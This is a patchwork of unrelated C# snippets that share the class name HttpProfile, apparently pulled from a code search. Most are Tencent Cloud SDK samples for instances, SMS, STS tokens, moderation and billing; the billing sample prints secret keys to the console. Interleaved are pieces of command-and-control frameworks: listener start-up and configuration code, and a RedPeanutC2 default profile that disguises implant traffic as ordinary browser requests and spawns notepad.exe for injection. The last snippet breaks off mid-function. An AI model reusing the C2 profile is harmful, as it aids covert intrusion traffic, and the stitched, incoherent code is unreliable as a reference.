static void Main(string[] args) { try { // 必要步骤: // 实例化一个认证对象,入参需要传入腾讯云账户密钥对secretId,secretKey。 // 这里采用的是从环境变量读取的方式,需要在环境变量中先设置这两个值。 // 你也可以直接在代码中写死密钥对,但是小心不要将代码复制、上传或者分享给他人, // 以免泄露密钥对危及你的财产安全。 Credential cred = new Credential { SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") }; // 实例化一个client选项,可选的,没有特殊需求可以跳过 ClientProfile clientProfile = new ClientProfile(); // 指定签名算法(默认为HmacSHA256) clientProfile.SignMethod = ClientProfile.SIGN_TC3SHA256; // 非必要步骤 // 实例化一个客户端配置对象,可以指定超时时间等配置 HttpProfile httpProfile = new HttpProfile(); // SDK默认使用POST方法。 // 如果你一定要使用GET方法,可以在这里设置。GET方法无法处理一些较大的请求。 httpProfile.ReqMethod = "GET"; // SDK有默认的超时时间,非必要请不要进行调整。 // 如有需要请在代码中查阅以获取最新的默认值。 httpProfile.Timeout = 10; // 请求连接超时时间,单位为秒(默认60秒) // SDK会自动指定域名。通常是不需要特地指定域名的,但是如果你访问的是金融区的服务, // 则必须手动指定域名,例如云服务器的上海金融区域名: httpProfile.Endpoint = ""; // 代理服务器,当你的环境下有代理服务器时设定 httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; // 实例化要请求产品(以cvm为例)的client对象 // 第二个参数是地域信息,可以直接填写字符串ap-guangzhou,或者引用预设的常量,clientProfile是可选的 CvmClient client = new CvmClient(cred, "ap-guangzhou", clientProfile); // 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 // 你可以直接查询SDK源码确定DescribeInstancesRequest有哪些属性可以设置, // 属性可能是基本类型,也可能引用了另一个数据结构。 // 推荐使用IDE进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明。 DescribeInstancesRequest req = new DescribeInstancesRequest(); // 基本类型的设置。 // 此接口允许设置返回的实例数量。此处指定为只返回一个。 // SDK采用的是指针风格指定参数,即使对于基本类型你也需要用指针来对参数赋值。 // SDK提供对基本类型的指针引用封装函数 req.Limit = 1; // 数组类型的设置。 // 此接口允许指定实例 ID 进行过滤,但是由于和接下来要演示的 Filter 参数冲突,先注释掉。 // req.InstanceIds = new string[] { "ins-r8hr2upy" }; // 复杂对象的设置。 // 在这个接口中,Filters是数组,数组的元素是复杂对象Filter,Filter的成员Values是string数组。 // 填充请求参数,这里request对象的成员变量即对应接口的入参 // 你可以通过官网接口文档或跳转到request对象的定义处查看请求参数的定义 Filter zoneFilter = new Filter(); // 创建Filter对象, 以zone的维度来查询cvm实例 zoneFilter.Name = "zone"; zoneFilter.Values = new string[] { "ap-guangzhou-1", "ap-guangzhou-2" }; Filter nameFilter = new Filter(); nameFilter.Name = "instance-name"; nameFilter.Values = new string[] { "中文测试" }; req.Filters = new Filter[] { zoneFilter, nameFilter }; // Filters 是成员为Filter对象的列表 //// 这里还支持以标准json格式的string来赋值请求参数的方式。下面的代码跟上面的参数赋值是等效的 //string strParams = "{\"Filters\":[{\"Name\":\"zone\",\"Values\":[\"ap-guangzhou-1\",\"ap-guangzhou-2\"]}]}"; //req = DescribeInstancesRequest.FromJsonString<DescribeInstancesRequest>(strParams); // 通过client对象调用DescribeInstances方法发起请求。注意请求方法名与请求对象是对应的 // 返回的resp是一个DescribeInstancesResponse类的实例,与请求对象对应 DescribeInstancesResponse resp = client.DescribeInstancesSync(req); // 输出json格式的字符串回包 Console.WriteLine(AbstractModel.ToJsonString(resp)); // 也可以取出单个值。 // 你可以通过官网接口文档或跳转到response对象的定义处查看返回字段的定义 Console.WriteLine(resp.TotalCount); } catch (Exception e) { Console.WriteLine(e.ToString()); } Console.Read(); }
/// <summary> /// Constructor. /// </summary> /// <param name="signMethod">Signature process method.</param> /// <param name="httpProfile">HttpProfile instance.</param> public ClientProfile(string signMethod, HttpProfile httpProfile) { this.SignMethod = signMethod; this.HttpProfile = httpProfile; this.Language = Language.DEFAULT; }
// 该示例要运行成功,需要修改一些网络和安全组的设置。 // 请慎重运行该示例,因为创建成功后会产生扣费。 static void Main1(string[] args) { try { // 必要步骤: // 实例化一个认证对象,入参需要传入腾讯云账户密钥对secretId,secretKey。 // 这里采用的是从环境变量读取的方式,需要在环境变量中先设置这两个值。 // 你也可以直接在代码中写死密钥对,但是小心不要将代码复制、上传或者分享给他人, // 以免泄露密钥对危及你的财产安全。 Credential cred = new Credential { SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") }; // 实例化一个client选项,可选的,没有特殊需求可以跳过 ClientProfile clientProfile = new ClientProfile(); // 非必要步骤 // 实例化一个客户端配置对象,可以指定超时时间等配置 HttpProfile httpProfile = new HttpProfile(); // 代理服务器,当你的环境下有代理服务器时设定 httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; // 实例化要请求产品(以cvm为例)的client对象 // 第二个参数是地域信息,可以直接填写字符串ap-guangzhou,或者引用预设的常量,clientProfile是可选的 CvmClient client = new CvmClient(cred, "ap-guangzhou", clientProfile); // 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 // 你可以直接查询SDK源码确定DescribeZonesRequest有哪些属性可以设置, // 属性可能是基本类型,也可能引用了另一个数据结构。 // 推荐使用IDE进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明。 RunInstancesRequest req = new RunInstancesRequest(); Placement placement = new Placement(); placement.Zone = "ap-guangzhou-3"; req.Placement = placement; req.ImageId = "img-8toqc6s3"; req.InstanceChargeType = "POSTPAID_BY_HOUR"; req.InstanceName = "DOTNET_SDK_TEST"; req.InstanceType = "S2.SMALL1"; InternetAccessible ia = new InternetAccessible(); ia.InternetChargeType = "BANDWIDTH_POSTPAID_BY_HOUR"; ia.InternetMaxBandwidthOut = 10; ia.PublicIpAssigned = true; req.InternetAccessible = ia; LoginSettings ls = new LoginSettings(); ls.Password = "******"; req.LoginSettings = ls; req.SecurityGroupIds = new string[] { "sg-icy671l9" }; SystemDisk sd = new SystemDisk(); sd.DiskSize = 50; sd.DiskType = "CLOUD_BASIC"; req.SystemDisk = sd; VirtualPrivateCloud vpc = new VirtualPrivateCloud(); vpc.VpcId = "vpc-8ek64x3d"; vpc.SubnetId = "subnet-b1wk8b10"; req.VirtualPrivateCloud = vpc; // 通过client对象调用DescribeInstances方法发起请求。注意请求方法名与请求对象是对应的 // 返回的resp是一个DescribeInstancesResponse类的实例,与请求对象对应 RunInstancesResponse resp = client.RunInstancesSync(req); // 输出json格式的字符串回包 Console.WriteLine(AbstractModel.ToJsonString(resp)); } catch (Exception e) { Console.WriteLine(e.ToString()); } Console.Read(); }
public ClientProfile() { SignMethod = SIGN_MD5; HttpProfile = new HttpProfile(); }
public static Dictionary <string, object> genCredential(Dictionary <string, object> values) { checkArguments(values, new string[] { "secretId", "secretKey", "region" }); Credential cred = new Credential { SecretId = (string)values["secretId"], SecretKey = (string)values["secretKey"] }; string region = (string)values["region"]; ClientProfile clientProfile = new ClientProfile(); HttpProfile httpProfile = new HttpProfile(); String endpoint = values.ContainsKey("Domain") ? (string)values["Domain"]: ""; httpProfile.Endpoint = endpoint; clientProfile.HttpProfile = httpProfile; // get policy string policy = null; if (values.ContainsKey("policy")) { policy = (string)values["policy"]; } if (policy == null) { checkArguments(values, new string[] { "bucket", "allowActions" }); string bucket = (string)values["bucket"]; string[] allowActions = (string[])values["allowActions"]; string[] allowPrefixes; if (values.ContainsKey("allowPrefix")) { allowPrefixes = new string[] { (string)values["allowPrefix"] }; } else if (values.ContainsKey("allowPrefixes")) { allowPrefixes = (string[])values["allowPrefixes"]; } else { throw new System.ArgumentException("allowPrefix and allowPrefixes are both null."); } policy = getPolicy(region, bucket, allowPrefixes, allowActions); } // duration Int32 durationSeconds = 1800; if (values.ContainsKey("durationSeconds")) { durationSeconds = (Int32)values["durationSeconds"]; } Dictionary <string, object> body = new Dictionary <string, object>(); body.Add("DurationSeconds", durationSeconds); body.Add("Name", "cos-sts-sdk-dotnet"); body.Add("Policy", policy); StsClient client = new StsClient(cred, region, clientProfile); GetFederationTokenRequest req = new GetFederationTokenRequest(); string strParams = JsonConvert.SerializeObject(body); req = GetFederationTokenRequest.FromJsonString <GetFederationTokenRequest>(strParams); GetFederationTokenResponse resp = client.GetFederationToken(req). ConfigureAwait(false).GetAwaiter().GetResult(); string jsonString = JsonConvert.SerializeObject(resp); Dictionary <string, object> dic = JsonConvert.DeserializeObject <Dictionary <string, object> >(jsonString); if (dic.ContainsKey("ExpiredTime")) { dic.Add("StartTime", Int32.Parse(dic["ExpiredTime"].ToString()) - durationSeconds); } return(dic); }
public ActionResult <HttpListener> PutHttpListener([FromBody] HttpListener httpListener) { Listener listener = _context.Listeners.FirstOrDefault(L => L.Id == httpListener.Id); if (listener == null) { return(NotFound()); } ListenerType listenerType = _context.ListenerTypes.FirstOrDefault(L => L.Id == listener.ListenerTypeId); if (listenerType == null || listenerType.Name != "HTTP") { return(NotFound()); } HttpListener savedhttpListener = (HttpListener)listener; // URL is calculated from BindAddress, BindPort, UseSSL components // Default to setting based on URL if requested URL differs if (savedhttpListener.Url != httpListener.Url) { savedhttpListener.Url = httpListener.Url; } else { savedhttpListener.BindAddress = httpListener.BindAddress; savedhttpListener.BindPort = httpListener.BindPort; savedhttpListener.ConnectAddress = httpListener.ConnectAddress; savedhttpListener.UseSSL = httpListener.UseSSL; } savedhttpListener.ProfileId = httpListener.ProfileId; savedhttpListener.Name = httpListener.Name; savedhttpListener.SSLCertificate = httpListener.SSLCertificate; if (savedhttpListener.Status == Listener.ListenerStatus.Active && httpListener.Status == Listener.ListenerStatus.Stopped) { savedhttpListener.Stop(_cancellationTokens[savedhttpListener.Id]); savedhttpListener.Status = httpListener.Status; } else if (savedhttpListener.Status != Listener.ListenerStatus.Active && httpListener.Status == Listener.ListenerStatus.Active) { if (savedhttpListener.UseSSL && (savedhttpListener.SSLCertHash == "" || savedhttpListener.SSLCertificate == "")) { return(BadRequest()); } else if (_context.Listeners.Where(L => L.Status == Listener.ListenerStatus.Active && L.BindPort == listener.BindPort).Any()) { return(BadRequest()); } HttpProfile profile = (HttpProfile)_context.Profiles.FirstOrDefault(HP => HP.Id == savedhttpListener.ProfileId); CancellationTokenSource listenerCancellationToken = savedhttpListener.Start(profile); if (listenerCancellationToken == null) { return(BadRequest()); } NetworkIndicator httpIndicator = new NetworkIndicator { Protocol = "http", Domain = Utilities.IsIPAddress(savedhttpListener.ConnectAddress) ? "" : savedhttpListener.ConnectAddress, IPAddress = Utilities.IsIPAddress(savedhttpListener.ConnectAddress) ? savedhttpListener.ConnectAddress : "", Port = savedhttpListener.BindPort, URI = savedhttpListener.Url }; if (_context.Indicators.Where(I => I.Name == "NetworkIndicator") .Select(I => (NetworkIndicator)I) .FirstOrDefault(I => I.IPAddress == httpIndicator.IPAddress && I.Domain == httpIndicator.Domain) == null) { _context.Indicators.Add(httpIndicator); } _cancellationTokens[savedhttpListener.Id] = listenerCancellationToken; } _context.Listeners.Update(savedhttpListener); _context.SaveChanges(); return(Ok(listener)); }
public int GetDefaultProfile() { if (defaultprofileid == 0) { if (Directory.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, PROFILES_FOLDER))) { string[] fileEntries = Directory.GetFiles(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, PROFILES_FOLDER)); foreach (string filepath in fileEntries) { string filename = Path.GetFileName(filepath); if (filename.EndsWith(".json") && filename.Split('_').Length == 2) { try { string profileidstr = filename.Split('_')[1].Split('.')[0]; if (Int32.TryParse(profileidstr, out int profileid)) { string profilefilecont = File.ReadAllText(filepath); HttpProfile profile = JsonConvert.DeserializeObject <HttpProfile>(profilefilecont); if (profile.Default) { defaultprofileid = profileid; } availableprofile.Add(profileid, profile); } } catch { } } } if (availableprofile.Count == 0) { Console.WriteLine("[*] No profile avalilable, creating new one..."); var profile = new HttpProfile { Delay = 5000, Default = true, Name = "Default", UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", ContentUri = "/content/", Spawn = "notepad.exe", HtmlCovered = false, InjectionManaged = true }; HttpGet httpget = new HttpGet { ApiPath = new string[] { "/newslist.jsp" } }; HttpClient getclient = new HttpClient(); HttpHeader[] headers = new HttpHeader[3]; HttpHeader header = new HttpHeader { Name = "Cache-Control", Value = "no-cache" }; headers[0] = header; header = new HttpHeader { Name = "Connection", Value = "Keep-Alive" }; headers[1] = header; header = new HttpHeader { Name = "Pragma", Value = "no-cache" }; headers[2] = header; getclient.Headers = headers; httpget.Client = getclient; HttpServer getserver = new HttpServer(); HttpHeader[] serverheaders = new HttpHeader[3]; HttpHeader serverheader = new HttpHeader { Name = "Content-Type", Value = "application/octet-stream" }; serverheaders[0] = serverheader; serverheader = new HttpHeader { Name = "Connection", Value = "Keep-Alive" }; serverheaders[1] = serverheader; serverheader = new HttpHeader { Name = "Server", Value = "Apache" }; serverheaders[2] = serverheader; getserver.Headers = serverheaders; httpget.Server = getserver; profile.HttpGet = httpget; var httppost = new HttpPost { ApiPath = new string[] { "/newslist.jsp" }, Client = getclient, Server = getserver, Param = "stocklevel", Mask = @"{0}={1}" }; profile.HttpPost = httppost; string deser = JsonConvert.SerializeObject(profile, Formatting.Indented); File.WriteAllText(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, PROFILES_FOLDER, "default_1.json"), deser); defaultprofileid = 1; availableprofile.Add(defaultprofileid, profile); } } else { Console.WriteLine(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, PROFILES_FOLDER)); } if (defaultprofileid == 0 && availableprofile.Count > 0) { availableprofile.First().Value.Default = true; defaultprofileid = availableprofile.First().Key; } return(defaultprofileid); } else { return(defaultprofileid); } }
static void Main(string[] args) { try { /* 必要步骤: * 实例化一个认证对象,入参需要传入腾讯云账户密钥对 secretId 和 secretKey * 本示例采用从环境变量读取的方式,需要预先在环境变量中设置这两个值 * 您也可以直接在代码中写入密钥对,但需谨防泄露,不要将代码复制、上传或者分享给他人 * CAM 密匙查询:*/ Credential cred = new Credential { SecretId = "xxx", SecretKey = "xxx" }; /* * Credential cred = new Credential { * SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), * SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") * };*/ /* 非必要步骤: * 实例化一个客户端配置对象,可以指定超时时间等配置 */ ClientProfile clientProfile = new ClientProfile(); /* SDK 默认用 TC3-HMAC-SHA256 进行签名 * 非必要请不要修改该字段 */ clientProfile.SignMethod = ClientProfile.SIGN_TC3SHA256; /* 非必要步骤 * 实例化一个客户端配置对象,可以指定超时时间等配置 */ HttpProfile httpProfile = new HttpProfile(); /* SDK 默认使用 POST 方法 * 如需使用 GET 方法,可以在此处设置,但 GET 方法无法处理较大的请求 */ httpProfile.ReqMethod = "POST"; /* SDK 有默认的超时时间,非必要请不要进行调整 * 如有需要请在代码中查阅以获取最新的默认值 */ httpProfile.Timeout = 10; // 请求连接超时时间,单位为秒(默认60秒) /* SDK 会自动指定域名,通常无需指定域名,但访问金融区的服务时必须手动指定域名 * 例如 SMS 的上海金融区域名为 */ httpProfile.Endpoint = ""; // 代理服务器,当您的环境下有代理服务器时设定 httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; /* 实例化 SMS 的 client 对象 * 第二个参数是地域信息,可以直接填写字符串 ap-guangzhou,或者引用预设的常量 */ SmsClient client = new SmsClient(cred, "ap-guangzhou", clientProfile); /* 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 * 您可以直接查询 SDK 源码确定 SendSmsRequest 有哪些属性可以设置 * 属性可能是基本类型,也可能引用了另一个数据结构 * 推荐使用 IDE 进行开发,可以方便地跳转查阅各个接口和数据结构的文档说明 */ PullSmsSendStatusRequest req = new PullSmsSendStatusRequest(); /* 基本类型的设置: * SDK 采用的是指针风格指定参数,即使对于基本类型也需要用指针来对参数赋值 * SDK 提供对基本类型的指针引用封装函数 * 帮助链接: * 短信控制台: * sms helper: */ // 设置拉取最大条数,最多100条 req.Limit = 100; /* 短信应用 ID: 在 [短信控制台] 添加应用后生成的实际 SDKAppID,例如1400006666 */ req.SmsSdkAppid = "1400009099"; // 通过 client 对象调用 AddSmsTemplateRequest 方法发起请求,注意请求方法名与请求对象是对应的 // 返回的 resp 是一个 AddSmsTemplateResponse 类的实例,与请求对象对应 PullSmsSendStatusResponse resp = client.PullSmsSendStatusRequest(req); // 输出 JSON 格式的字符串回包 Console.WriteLine(AbstractModel.ToJsonString(resp)); } catch (Exception e) { Console.WriteLine(e.ToString()); } Console.Read(); }
/// <summary> /// 发送模板短信 /// </summary> /// <param name="mobile">多个手机号用英文状态下的逗号分隔</param> /// <param name="tempCode">模板ID</param> /// <param name="tempParams">多个参数英文状态下的逗号分隔,模板中的{数字}代表一个参数</param> /// <returns></returns> public async Task <(bool isSuccess, string errMsg)> SendMsgAsync(string mobile, string tempCode, string tempParams) { try { /* 必要步骤: * 实例化一个认证对象,入参需要传入腾讯云账户密钥对 secretId 和 secretKey * 本示例采用从环境变量读取的方式,需要预先在环境变量中设置这两个值 * 您也可以直接在代码中写入密钥对,但需谨防泄露,不要将代码复制、上传或者分享给他人 * CAM 密匙查询: */ Credential cred = new Credential { SecretId = Config.SMSUId, SecretKey = Config.SMSPwd }; /* * Credential cred = new Credential { * SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), * SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") * };*/ /* 非必要步骤: * 实例化一个客户端配置对象,可以指定超时时间等配置 */ ClientProfile clientProfile = new ClientProfile(); /* SDK 默认用 TC3-HMAC-SHA256 进行签名 * 非必要请不要修改该字段 */ clientProfile.SignMethod = ClientProfile.SIGN_TC3SHA256; /* 非必要步骤 * 实例化一个客户端配置对象,可以指定超时时间等配置 */ HttpProfile httpProfile = new HttpProfile(); /* SDK 默认使用 POST 方法 * 如需使用 GET 方法,可以在此处设置,但 GET 方法无法处理较大的请求 */ httpProfile.ReqMethod = "POST"; /* SDK 有默认的超时时间,非必要请不要进行调整 * 如有需要请在代码中查阅以获取最新的默认值 */ httpProfile.Timeout = 10; // 请求连接超时时间,单位为秒(默认60秒) /* SDK 会自动指定域名,通常无需指定域名,但访问金融区的服务时必须手动指定域名 * 例如 SMS 的上海金融区域名为 */ httpProfile.Endpoint = Config.EndPoint; // 代理服务器,当您的环境下有代理服务器时设定 //httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; /* 实例化 SMS 的 client 对象 * 第二个参数是地域信息,可以直接填写字符串 ap-guangzhou,或者引用预设的常量 */ SmsClient client = new SmsClient(cred, Config.RegionId, clientProfile); /* 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 * 您可以直接查询 SDK 源码确定 SendSmsRequest 有哪些属性可以设置 * 属性可能是基本类型,也可能引用了另一个数据结构 * 推荐使用 IDE 进行开发,可以方便地跳转查阅各个接口和数据结构的文档说明 */ SendSmsRequest req = new SendSmsRequest(); /* 基本类型的设置: * SDK 采用的是指针风格指定参数,即使对于基本类型也需要用指针来对参数赋值 * SDK 提供对基本类型的指针引用封装函数 * 帮助链接: * 短信控制台: * sms helper: */ req.SmsSdkAppid = Config.APPID; /* 短信签名内容: 使用 UTF-8 编码,必须填写已审核通过的签名,可登录 [短信控制台] 查看签名信息 */ req.Sign = Config.SignName; /* 短信码号扩展号: 默认未开通,如需开通请联系 [sms helper] */ //req.ExtendCode = "x"; /* 国际/港澳台短信 senderid: 国内短信填空,默认未开通,如需开通请联系 [sms helper] */ req.SenderId = ""; /* 用户的 session 内容: 可以携带用户侧 ID 等上下文信息,server 会原样返回 */ req.SessionContext = System.DateTime.Now.ToString("yyyyMMddHHmmss") + new Random().Next(10000, 100000 - 1).ToString();; /* 下发手机号码,采用 e.164 标准,+[国家或地区码][手机号] * 例如+8613711112222, 其中前面有一个+号 ,86为国家码,13711112222为手机号,最多不要超过200个手机号*/ var arrPhones = mobile.Split(','); var lstPhone = new List <string>(); foreach (var item in arrPhones) { if (item.Trim().Length > 0) { lstPhone.Add("+86" + item); } } req.PhoneNumberSet = lstPhone.ToArray(); /* 模板 ID: 必须填写已审核通过的模板 ID,可登录 [短信控制台] 查看模板 ID */ req.TemplateID = tempCode; /* 模板参数: 若无模板参数,则设置为空*/ var arrParams = tempParams.Split(','); var lstParams = new List <string>(); foreach (var item in arrParams) { if (item.Trim().Length > 0) { lstParams.Add(item); } } req.TemplateParamSet = lstParams.ToArray(); // 通过 client 对象调用 SendSms 方法发起请求,注意请求方法名与请求对象是对应的 // 返回的 resp 是一个 SendSmsResponse 类的实例,与请求对象对应 SendSmsResponse resp = await client.SendSms(req); // 输出 JSON 格式的字符串回包 if (resp.SendStatusSet.Length > 0) { if (resp.SendStatusSet[0].Code == "Ok") { return(true, ""); } else { return(false, resp.SendStatusSet[0].Message); } } else { return(false, "未返回值"); } //Console.WriteLine(AbstractModel.ToJsonString(resp)); } catch (Exception ex) { return(false, ex.Message); //Console.WriteLine(e.ToString()); } }
/// <summary> /// Constructor. /// </summary> /// <param name="signMethod">Signature process method.</param> /// <param name="httpProfile">HttpProfile instance.</param> public ClientProfile(string signMethod, HttpProfile httpProfile) { this.SignMethod = signMethod; this.HttpProfile = httpProfile; }
public ClientProfile() { SignMethod = SIGN_SHA256; HttpProfile = new HttpProfile(); }
public Startup(IConfiguration configuration) { Configuration = configuration; profile = RedPeanutC2.server.GetProfile(Int32.Parse(Configuration["FrameworkProfileid"])); ssl = bool.Parse(Configuration["FrameworkSSL"]); }
/// <summary> /// 注意使用时,要缩小图片的尺寸 /// </summary> /// <param name="bytes"></param> /// <returns></returns> public static DetectionResult Detection(byte[] bytes) { try { var cred = new Credential { SecretId = API_KEY, SecretKey = SECRET_KEY }; var clientProfile = new ClientProfile(); var httpProfile = new HttpProfile(); httpProfile.Endpoint = ""; clientProfile.HttpProfile = httpProfile; var client = new TiiaClient(cred, Region_Id, clientProfile); var req = new ImageModerationRequest(); req.Scenes = new[] { "P**N" }; req.ImageBase64 = Convert.ToBase64String(bytes); var resp = client.ImageModeration(req).ConfigureAwait(false).GetAwaiter().GetResult(); var ret = new DetectionResult { Platform = "腾讯" }; switch (resp.PornResult.Type.ToLower()) { case "normal": ret.Result = DetectionResultType.Normal; break; case "p**n": ret.Result = DetectionResultType.P**n; break; case "hot": ret.Result = DetectionResultType.Sexy; break; case "breast": case "ass": case "bareBody": case "unrealHotPeople": ret.Result = resp.PornResult.Suggestion == "PASS" ? DetectionResultType.Sexy : DetectionResultType.P**n; break; default: ret.Result = DetectionResultType.Unknow; break; } ret.Items.Add(new DetectionResultItem { Suggestion = resp.PornResult.Confidence ?? 0, TypeName = resp.PornResult.Type }); ret.SourceResult = JsonConvert.SerializeObject(resp, Formatting.Indented); return(ret); } catch (Exception ex) { Console.WriteLine(ex.ToString()); return(new DetectionResult { Error = ex.Message, Platform = "腾讯" }); } }
public void Test() { int createFileIndex = 1; string[] allFiles = Directory.GetFiles(path, "*.xlsx"); foreach (string strFile in allFiles) { File.Delete(strFile); } ListBoxItemAdd(this, this.listBox1, "프로그램 시작 합니다. ^_^"); foreach (int indexChecked in checkedListBox1.CheckedIndices) { String lineStr = tt[indexChecked].ToString(); Console.WriteLine(lineStr); try { string[] sArray = lineStr.Split(' '); if (sArray.Count() < 2) //작업완료 판단 { break; } Company = sArray[0]; UIN = sArray[1].Replace(" ", ""); SecretIdfromeFile = sArray[2].Replace(" ", ""); SecretKeyfromeFile = sArray[3].Replace(" ", ""); SecretKeyfromeFile = sArray[3].Replace(" ", ""); CVMRegion = sArray[4].Replace(" ", ""); BeginTime = dateTimePicker1.Value.ToString("yyyy-MM-01 00:00:00"); EndTime = dateTimePicker1.Value.ToString("yyyy-MM-01 00:00:01"); months = dateTimePicker1.Value.ToString("yyyy년MM월"); Console.WriteLine(Company); Console.WriteLine(UIN); Console.WriteLine(SecretIdfromeFile); Console.WriteLine(SecretKeyfromeFile); Console.WriteLine(BeginTime); Console.WriteLine(EndTime); Thread.Sleep(1000); ListBoxItemAdd(this, this.listBox1, "======<< 업체명 : " + Company + " >>====="); fileName = createFileIndex + "-" + Company + "-" + months + ".xlsx"; //파일생성 WriteExel(fileName, 1, 1, "TotalCost"); WriteExel("모든업체-" + months + ".xlsx", allCompanyIndex, 1, Company); Credential cred = new Credential { SecretId = SecretIdfromeFile, SecretKey = SecretKeyfromeFile }; ClientProfile clientProfile = new ClientProfile(); HttpProfile httpProfile = new HttpProfile(); httpProfile.Endpoint = (""); clientProfile.HttpProfile = httpProfile; BillingClient client = new BillingClient(cred, CVMRegion, clientProfile); DescribeBillSummaryByProductRequest req = new DescribeBillSummaryByProductRequest(); string strParams = "{\"PayerUin\":\"" + UIN + "\",\"BeginTime\":\"" + BeginTime + "\",\"EndTime\":\"" + EndTime + "\"}"; req = DescribeBillSummaryByProductRequest.FromJsonString <DescribeBillSummaryByProductRequest>(strParams); DescribeBillSummaryByProductResponse resp = client.DescribeBillSummaryByProduct(req).ConfigureAwait(false).GetAwaiter().GetResult(); // Console.WriteLine(AbstractModel.ToJsonString(resp)); String ttt = AbstractModel.ToJsonString(resp); String total = GetSummaryTotal(ttt); WriteExel(fileName, 1, 2, total); WriteExel("모든업체-" + months + ".xlsx", allCompanyIndex, 2, total); allCompanyIndex++; ListBoxItemAdd(this, this.listBox1, "Total : =》 " + total); Dictionary <string, string> Overview = GetSummaryOverview(ttt); exelIndex = 2; foreach (var item in Overview) { Console.WriteLine(item.Key + item.Value); WriteExel(fileName, exelIndex, 1, item.Key); WriteExel(fileName, exelIndex, 2, item.Value); exelIndex++; ListBoxItemAdd(this, this.listBox1, item.Key + " ---> " + item.Value); } createFileIndex++; Thread.Sleep(100); } catch (Exception e) { //WriteExel(fileName, exelIndex, 1, Company); WriteExel("모든업체-" + months + ".xlsx", allCompanyIndex, 2, "에러"); createFileIndex++; ListBoxItemAdd(this, this.listBox1, "<< 업체명 : " + Company + " >> 요금 실패~~"); } ListBoxItemAdd(this, this.listBox1, " "); ListBoxItemAdd(this, this.listBox1, " "); } }
public override async void Command(MenuItem menuItem, string UserInput) { try { HttpListener httpListener = ((HTTPListenerMenuItem)menuItem).HttpListener; string[] commands = UserInput.Split(" "); if (commands.Length != 3 || !commands[0].Equals(this.Name, StringComparison.OrdinalIgnoreCase)) { menuItem.PrintInvalidOptionError(UserInput); return; } if (this.Parameters.FirstOrDefault(P => P.Name == "Option").Values.Select(V => V.Value).Contains(commands[1], StringComparer.OrdinalIgnoreCase)) { if (commands[1].Equals("name", StringComparison.OrdinalIgnoreCase)) { httpListener.Name = commands[2]; } else if (commands[1].Equals("url", StringComparison.OrdinalIgnoreCase)) { try { httpListener.Url = commands[2]; Uri uri = new Uri(httpListener.Url); httpListener.UseSSL = uri.Scheme == "https"; httpListener.ConnectAddress = uri.Host; httpListener.BindPort = uri.Port; } catch (Exception) { EliteConsole.PrintFormattedErrorLine("Specified URL: \"" + commands[2] + "\" is not a valid URI"); menuItem.PrintInvalidOptionError(UserInput); return; } } else if (commands[1].Equals("connectaddress", StringComparison.OrdinalIgnoreCase)) { httpListener.ConnectAddress = commands[2]; string scheme = (httpListener.UseSSL ?? default) ? "https://" : "http://"; Uri uri = new Uri(scheme + httpListener.ConnectAddress + ":" + httpListener.BindPort); httpListener.Url = uri.ToString(); } else if (commands[1].Equals("bindaddress", StringComparison.OrdinalIgnoreCase)) { httpListener.BindAddress = commands[2]; } else if (commands[1].Equals("bindport", StringComparison.OrdinalIgnoreCase)) { int.TryParse(commands[2], out int n); httpListener.BindPort = n; string scheme = (httpListener.UseSSL ?? default) ? "https://" : "http://"; Uri uri = new Uri(scheme + httpListener.ConnectAddress + ":" + httpListener.BindPort); httpListener.Url = uri.ToString(); } else if (commands[1].Equals("usessl", StringComparison.OrdinalIgnoreCase)) { httpListener.UseSSL = commands[2].StartsWith("t", StringComparison.OrdinalIgnoreCase); string scheme = (httpListener.UseSSL ?? default) ? "https://" : "http://"; Uri uri = new Uri(scheme + httpListener.ConnectAddress + ":" + httpListener.BindPort); httpListener.Url = uri.ToString(); } else if (commands[1].Equals("sslcertpath", StringComparison.OrdinalIgnoreCase)) { string FileName = Path.Combine(Common.EliteDataFolder, commands[2]); if (!File.Exists(FileName)) { menuItem.PrintInvalidOptionError(UserInput); EliteConsole.PrintFormattedErrorLine("File: \"" + FileName + "\" does not exist on the local system."); return; } X509Certificate2 certificate = new X509Certificate2(FileName, httpListener.SslCertificatePassword); httpListener.SslCertificate = Convert.ToBase64String(File.ReadAllBytes(FileName)); ((HTTPListenerMenuItem)menuItem).SSLCertPath = FileName; } else if (commands[1].Equals("sslcertpassword", StringComparison.OrdinalIgnoreCase)) { httpListener.SslCertificatePassword = commands[2]; } else if (commands[1].Equals("httpprofile", StringComparison.OrdinalIgnoreCase)) { HttpProfile profile = ((HTTPListenerMenuItem)menuItem).HttpProfiles.FirstOrDefault(HP => HP.Name.Equals(commands[2], StringComparison.OrdinalIgnoreCase)); if (profile == null) { menuItem.PrintInvalidOptionError(UserInput); EliteConsole.PrintFormattedErrorLine("HttpProfile: \"" + commands[2] + "\" does not exist."); return; } 